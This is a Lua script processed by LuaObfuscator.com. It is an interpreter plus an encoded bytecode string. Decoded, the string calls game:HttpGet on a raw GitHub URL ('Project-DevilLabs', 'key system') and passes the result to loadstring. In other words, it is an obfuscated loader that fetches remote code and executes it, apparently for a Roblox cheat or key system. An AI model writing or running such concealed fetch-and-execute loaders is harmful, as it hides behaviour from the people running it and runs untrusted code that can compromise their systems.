--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==2) then v23=function()local v39=0 -0;local v40;local v41;while true do if (v39==(1 + 0)) then return (v41 * (790 -534)) + v40;end if (v39==0) then v40,v41=v1(v16,v19,v19 + 2 + (423 -(420 + 3)));v19=v19 + (7 -5);v39=1843 -((8421 -6659) + 80);end end end;v24=nil;v24=function()local v42,v43,v44,v45=v1(v16,v19,v19 + (4 -1));v19=v19 + 2 + 2;return (v45 * (29651268 -12874052)) + (v44 * 65536) + (v43 * (1723 -((2137 -(282 + 604)) + 216))) + v42;end;v25=nil;v18=3;end if (1==v18) then v21=function(v31,v32,v33)if v33 then local v74=(v31/((3 -1)^(v32-(519 -(508 + 10)))))%((1783 -(1305 + 476))^(((v33-(1 + 0)) -(v32-(1 + 0))) + (3 -2)));return v74-(v74%(2 -(1 + 0)));else local v75=0 -0;local v76;while true do if (v75==(499 -(404 + 95))) then v76=2^(v32-1);return (((v31%(v76 + v76))>=v76) and (1 + (1699 -(232 + 1467)))) or (0 -0);end end end end;v22=nil;v22=function()local v46=v1(v16,v19,v19);v19=v19 + 1;return v46;end;v23=nil;v18=2;end if (v18==5) then v30=nil;v30=function(v34,v35,v36)local v47=v34[1];local v48=v34[2];local v49=v34[3];return function(...)local v69=1;local v70= -1;local v71={...};local v72=v12("#",...) -1;local function v73()local v77=v47;local v78=v48;local v79=v49;local v80=v28;local v81={};local v82={};local v83={};for v89=0 + (1695 -(209 + 1486)),v72 do if ((v89>=v79) or ((1562 -(554 + 116))>=(15263 -11174))) then v81[v89-v79]=v71[v89 + (4 -3)];else v83[v89]=v71[v89 + (512 -(248 + 263))];end end local v84=(v72-v79) + (1630 -((5773 -4293) + 149));local v85;local v86;while true do local v90=(1442 -(129 + 1313)) + 0;local v91;local v92;while true do if (((1252 -(122 + 458))==(2440 -1768)) and (v90==(1 + 0))) then while true do if (((58 + 1291)<=(5812 -(906 + 494))) and (v91==(0 + 0))) then v92=0 + 0;while true do if ((v92==(1 + 0)) or ((6510 -(1445 + 141))<=(4676 -(288 + 132)))) then if ((3232>=(10802 -7904)) and (v86<=(2 + 1))) then if (((454 + 2977)<(12295 -8672)) and (v86<=(1465 -(1224 + 240)))) then if ((v86==((0 -0) -0)) or ((7822 -6113)>(2502 -(119 + 630)))) then v83[v85[5 -3]]=v85[3 + 0]~=(0 -(927 -(764 + 163)));else local v113=0 + 0;local v114;local v115;local v116;local v117;local v118;while true do if (((2497 -(583 + 75))<=(4650 -(836 + 925))) and (v113==(1783 -(947 + 835)))) then local v138=0 + 0;while true do if ((4461>(9996 -6079)) and (v138==(775 -(760 + 15)))) then v116=nil;v117=nil;v138=1 + 0;end if ((v138==(3 -2)) or ((1401 + 1331)<(369 + 2088))) then v113=1091 -(318 + 771);break;end end end if ((v113==(3 -1)) or ((1464 + (4621 -3371))>((11276 -(498 + 1071)) -6069))) then v118=nil;while true do if (((380 -((1580 -(360 + 904)) + 62))==v114) or ((6016 -4322)>(371 + 2533))) then for v151=v115,v70 do local v152=0 + 0;while true do if ((v152==(0 + 0)) or ((2235 -(1787 + 19))>(4153 -(316 + 1120)))) then v118=v118 + (1 -0);v83[v151]=v116[v118];break;end end end break;end if (((1206 -(981 + 224))==v114) or ((170 -(50 + 106 + 4))>(1839 -(1559 + 180 + 17)))) then local v143=0 -0;local v144;while true do if (((3589 -(158 + 46))<=(4856 -(318 + 656))) and (v143==(0 + 0))) then v144=0 + (0 -0);while true do if (((3473 -(1333 + 42))>(37 + 79)) and (v144==(0 -0))) then local v165=1346 -(1101 + 245);while true do if (((5462 -((997 -(342 + 291)) + 691))>=(391 + (1989 -1019))) and (v165==(1 -0))) then v144=1974 -(210 + 1763);break;end if (((5954 -(111 + 1472))>(1769 -(658 + 304))) and (v165==(0 -0))) then v70=(v117 + v115) -(1294 -(228 + 1065));v118=(0 + 0) -0;v165=3 -2;end end end if (((260 -(163 + 35 + 61))==v144) or (((8771 -(905 + 860)) -(3341 -(90 + 99)))<((737 -(92 + 42)) + 303))) then v114=2 -0;break;end end break;end end end if ((v114==(0 -0)) or ((214 + 17)>(3048 -2235))) then local v145=(0 + 0) -0;while true do if (((0 -0)==v145) or ((5682 -(278 + 384 + 371))<=(157 + 2509))) then v115=v85[7 -5];v116,v117=v80(v83[v115](v13(v83,v115 + (1 -0),v85[1912 -(1796 + 113)])));v145=1 -0;end if ((v145==(1 + 0)) or (((3970 -(100 + 1148)) -(89 + 616))>=(4358 -(875 + 1007)))) then v114=59 -(39 + 19);break;end end end end break;end if ((v113==0) or ((5211 -(984 + 284))<(596 + 2002))) then local v139=0 -(0 -0);while true do if (((4426 -(191 + (1990 -(1656 + 65))))==(7307 -3341)) and ((1988 -(1324 + (2083 -(852 + 568))))==v139)) then v113=1 + 0;break;end if ((v139==(578 -(125 + 453))) or ((176 + 437)==(6317 -(640 + 690)))) then v114=0 + 0 + 0;v115=nil;v139=(1783 -(298 + 935)) -(159 + 390);end end end end end elseif (((5032 -(830 + 1020))<(8188 -(2561 + 647))) and (v86==(678 -(345 + 331)))) then v83[v85[7 -5]]();else do return;end end elseif (((902 + 2379)>((3432 -(220 + 1541)) + 853)) and (v86<=(1 + 4))) then if (((531 + 975)<(2579 -(283 + 368))) and (v86==(11 -7))) then local v119=1932 -(1892 + 40);local v120;while true do if (((650 -438)<(1613 -(863 + 247))) and (v119==(0 + 0))) then v120=v85[(147 -(35 + 111)) + 1];v83[v120]=v83[v120](v13(v83,v120 + (3 -2),v70));break;end end else local v121=1875 -(216 + 1659);local v122;local v123;local v124;while true do if ((v121==(2 -1)) or ((8367 -4958)<=(1419 + 1063))) then v124=nil;while true do if ((v122==(4 -3)) or ((1754 + 1399)==(6162 -(574 + 905)))) then v83[v123 + (334 -(116 + 217))]=v124;v83[v123]=v124[v85[2 + 2]];break;end if (((0 -0)==v122) or ((13693 -10084)<(1767 -(74 + 132)))) then v123=v85[(2810 -(1117 + 644)) -(131 + 916)];v124=v83[v85[2 + (1 -0)]];v122=1 + 0;end end break;end if ((v121==(0 -0)) or (4615<(2874 + 361))) then v122=0 + (0 -0);v123=nil;v121=1 -0;end end end elseif (((2362 + 438)>=(802 -(65 + 85 + 197))) and (v86>(17 -11))) then v83[v85[98 -(7 + 89)]]=v85[108 -(80 + 10 + 15)];else v83[v85[9 -7]]=v36[v85[3]];end v69=v69 + 1 + 0;break;end if ((v92==(0 + 0)) or (((18512 -13836) -(7 + 12))<=(2104 -((3062 -1863) + 420)))) then local v107=583 -(349 + 234);while true do if ((v107==(2 -1)) or ((3918 -(1322 + 265))<=(789 + 761))) then v92=1067 -((2583 -(1493 + 286)) + 262);break;end if (((68 + 397)==(622 -157)) and (v107==(0 + 0))) then local v109=0 -0;while true do if ((v109==(0 -0)) or ((637 + 417 + 2690)<(2594 + 527 + 85))) then v85=v77[v69];v86=v85[1536 -(1030 + 505)];v109=1 + (0 -0);end if (((477 -(8 + 2))<(4199 -(552 + 834))) and (v109==(63 -(23 + 39)))) then v107=1 + (1059 -(124 + 935));break;end end end end end end break;end end break;end if ((v90==(0 -0)) or ((3108 -(473 + 766 + 38 + 11))<(107 + 907))) then v91=(0 -0) + 0;v92=nil;v90=2 -(17 -(6 + 10));end end end end A,B=v28(v11(v73));if  not A[1] then local v93=0;local v94;while true do if (0==v93) then v94=v34[4][v69] or "?";error("Script error at ["   .. v94   .. "]:"   .. A[2]);break;end end else return v13(A,2,B);end end;end;return v30(v29(),{},v17)(...);end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v37)if (v1(v37,2)==79) then local v87=0;while true do if (v87==0) then v20=v0(v3(v37,1,1));return "";end end else local v88=v2(v0(v37,16));if v20 then local v95=v5(v88,v20);v20=nil;return v95;else return v88;end end end);v21=nil;v18=1;end if (v18==4) then v28=nil;v28=function(...)return {...},v12("#",...);end;v29=nil;v29=function()local v50=0 -0;local v51;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v50==0) then v51=0 + 0;v52=nil;v50=1;end if (v50==2) then v55=nil;v56=nil;v50=2 + 1;end if (v50==(1799 -(190 + 1606))) then v57=nil;v58=nil;v50=3 + 1;end if (v50~=(1 -0)) then else v53=nil;v54=nil;v50=800 -(76 + 722);end if (v50~=4) then else while true do if (v51==(0 -0)) then local v102=0;while true do if (v102==0) then v52=0;v53=nil;v102=1 + 0;end if (v102==(686 -(354 + 331))) then v51=1;break;end end end if (v51==(1 + 0)) then local v103=0 + 0;while true do if (v103==(0 + 0)) then v54=nil;v55=nil;v103=1 + 0;end if ((44 -(39 + 4))~=v103) then else v51=292 -(18 + 272);break;end end end if (3~=v51) then else v58=nil;while true do local v105=1782 -(1670 + 112);local v106;while true do if (v105==0) then v106=0;while true do if (v106==1) then if (v52==(1014 -(683 + 329))) then local v110=0 -0;local v111;while true do if (v110~=0) then else v111=1898 -(4 + 1894);while true do local v133=0;while true do if (v133==(1276 -(387 + 889))) then if (v111~=(0 -0)) then else for v153=1 + 0,v24() do local v154=0;local v155;local v156;local v157;while true do if (1~=v154) then else v157=nil;while true do if (v155==1) then while true do if (v156==0) then v157=v22();if (v21(v157,1,531 -(240 + 290))~=(1748 -(1397 + 351))) then else local v166=230 -(69 + 161);local v167;local v168;local v169;local v170;local v171;local v172;while true do if (v166~=(407 -(338 + 69))) then else v167=0 -0;v168=nil;v166=1;end if (v166==2) then v171=nil;v172=nil;v166=3;end if (v166==(4 -3)) then v169=nil;v170=nil;v166=373 -(189 + 182);end if (v166==3) then while true do if (v167==(1 + 1)) then v172=nil;while true do if (v168==1) then local v173=0 + 0;local v174;while true do if (v173==(605 -(107 + 498))) then v174=0 + 0;while true do if (v174~=(32 -(20 + 12))) then else local v184=1495 -(950 + 545);while true do if ((2 -1)==v184) then v174=1;break;end if (v184==0) then v171=nil;v172=nil;v184=283 -(180 + 102);end end end if (1==v174) then v168=592 -(480 + 110);break;end end break;end end end if (v168==0) then local v175=0;while true do if ((0 + 0)==v175) then v169=0 -0;v170=nil;v175=1;end if (v175~=1) then else v168=1;break;end end end if (2==v168) then while true do if ((0 + 0)==v169) then local v176=0 -0;local v177;while true do if (v176==(1290 -(701 + 589))) then v177=0;while true do if (v177==(0 + 0)) then local v187=285 -(29 + 256);local v188;while true do if (v187~=0) then else v188=0 -0;while true do if (1==v188) then v177=1;break;end if (v188~=0) then else v170=v21(v157,2,744 -(244 + 497));v171=v21(v157,4,6);v188=1;end end break;end end end if (v177==1) then v169=987 -(139 + 847);break;end end break;end end end if (v169==2) then local v178=0 -0;while true do if (v178==(1720 -(437 + 1283))) then local v185=0;local v186;while true do if (v185~=0) then else v186=0;while true do if (1==v186) then v178=1931 -(1057 + 873);break;end if (v186==0) then local v190=0;while true do if (v190==(981 -(78 + 903))) then if (v21(v171,1,1 + 0)~=1) then else v172[2]=v58[v172[1 + 1]];end if (v21(v171,602 -(393 + 207),1 + 1)==(1 -0)) then v172[3]=v58[v172[9 -6]];end v190=1;end if (v190==1) then v186=1;break;end end end end break;end end end if (v178~=1) then else v169=5 -2;break;end end end if (v169~=(1427 -(427 + 999))) then else local v179=0 -0;local v180;while true do if (v179~=0) then else v180=0;while true do if (v180~=(1 -0)) then else v169=1 + 1;break;end if (v180==0) then local v189=0;while true do if (v189==(1425 -(1069 + 356))) then v172={v23(),v23(),nil,nil};if (v170==0) then local v191=0;local v192;local v193;while true do if (0==v191) then v192=0;v193=nil;v191=1650 -(1135 + 514);end if (v191==(2 -1)) then while true do if (v192==0) then v193=0;while true do if ((1753 -(539 + 1214))~=v193) then else v172[1 + 2]=v23();v172[1 + 3]=v23();break;end end break;end end break;end end elseif (v170==1) then v172[3]=v24();elseif (v170==(1564 -(1363 + 199))) then v172[706 -(324 + 379)]=v24() -((1 + 1)^(4 + 12));elseif (v170==3) then local v200=0 -0;local v201;local v202;while true do if (v200~=(1943 -(1203 + 740))) then else v201=0;v202=nil;v200=1 -0;end if (v200==1) then while true do if (v201==(0 + 0)) then v202=0;while true do if (v202~=0) then else v172[3]=v24() -((1 + 1)^16);v172[3 + 1]=v23();break;end end break;end end break;end end end v189=1;end if (v189==(1 + 0)) then v180=1;break;end end end end break;end end end if (v169==(7 -4)) then if (v21(v171,6 -3,3)==(1742 -(1083 + 658))) then v172[966 -(929 + 33)]=v58[v172[4]];end v53[v153]=v172;break;end end break;end end break;end if (v167~=(1 + 0)) then else v170=nil;v171=nil;v167=2;end if (v167==0) then v168=0;v169=nil;v167=1 + 0;end end break;end end end break;end end break;end if (v155~=(0 + 0)) then else v156=0 -0;v157=nil;v155=1 -0;end end break;end if ((0 -0)==v154) then v155=0;v156=nil;v154=1362 -(462 + 899);end end end for v158=1,v24() do v54[v158-1]=v29();end v111=1145 -(725 + 419);end if (v111~=1) then else for v160=4 -3,v24() do v55[v160]=v24();end return v56;end break;end end end break;end end end break;end if (v106==(0 -0)) then local v108=0;while true do if (v108==(2 -1)) then v106=1;break;end if (v108==0) then if (v52==(1 -0)) then v57=v24();v58={};for v134=1,v57 do local v135=0 -0;local v136;local v137;while true do if (v135==1) then if (v136==1) then v137=v22()~=0;elseif (v136==2) then v137=v25();elseif (v136==(1538 -(1330 + 205))) then v137=v26();end v58[v134]=v137;break;end if (0~=v135) then else v136=v22();v137=nil;v135=3 -2;end end end v56[3 + 0]=v22();v52=1479 -(853 + 624);end if (v52~=0) then else local v132=0 + 0;while true do if (v132~=2) then else v52=1;break;end if (v132==(0 -0)) then v53={};v54={};v132=1;end if (1==v132) then v55={};v56={v53,v54,nil,v55};v132=4 -2;end end end v108=1;end end end end break;end end end break;end if (v51==2) then local v104=1159 -(1034 + 125);while true do if (v104~=(1 + 0)) then else v51=3;break;end if (v104~=0) then else v56=nil;v57=nil;v104=652 -(23 + 628);end end end end break;end end end;v18=5;end if (3==v18) then v25=function()local v59=0 + 0;local v60;local v61;local v62;local v63;local v64;local v65;while true do if (v59==(8 -5)) then if (v64==(0 + 0)) then if (v63==(415 -(324 + 91))) then return v65 * 0;else v64=523 -(258 + 264);v62=1002 -(737 + 265);end elseif (v64==2047) then return ((v63==(0 -(0 -0))) and (v65 * ((4 -3)/0))) or (v65 * NaN);end return v8(v65,v64-(2357 -(1184 + 150))) * (v62 + (v63/(((1 -0) + 1)^(1806 -(100 + 1654)))));end if (v59==(0 -0)) then v60=v24();v61=v24();v59=(3743 -1761) -(1388 + (1631 -1038));end if (v59==((983 -(981 + 1)) + 0)) then v62=1445 -(50 + 1394);v63=(v21(v61,1 -0,51 -31) * ((2 -(0 -0))^32)) + v60;v59=1259 -(526 + 731);end if (v59==(1 + 1)) then v64=v21(v61,21,1195 -(545 + 619));v65=((v21(v61,1716 -(1429 + 255))==((1 + 1) -1)) and  -(4 -3)) or (3 -2);v59=564 -(522 + 39);end end end;v26=nil;v26=function(v38)local v66=1962 -(918 + (1566 -(101 + 421)));local v67;local v68;while true do if (v66==(2 -(0 + 0))) then v68={};for v96=2 -1, #v67 do v68[v96]=v2(v1(v3(v67,v96,v96)));end v66=8 -5;end if (v66==(707 -(234 + 470))) then return v6(v68);end if (v66==1) then v67=v3(v16,v19,(v19 + v38) -(2 -1));v19=v19 + v38;v66=(2269 -(461 + 482)) -(868 + 456);end if (v66==0) then v67=nil;if  not v38 then v38=v24();if (v38==(1135 -(572 + 563))) then return "";end end v66=1 + 0;end end end;v27=v24;v18=4;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403543O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4461726B6573746C6567656E64732F50726F6A6563742D446576696C4C6162732F6D61696E2F6B657925323073797374656D00093O0012063O00013O001206000100023O002005000100010003001207000300046O000400014O0001000100044O00045O00022O00023O000100012O00033O00017O00093O00023O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
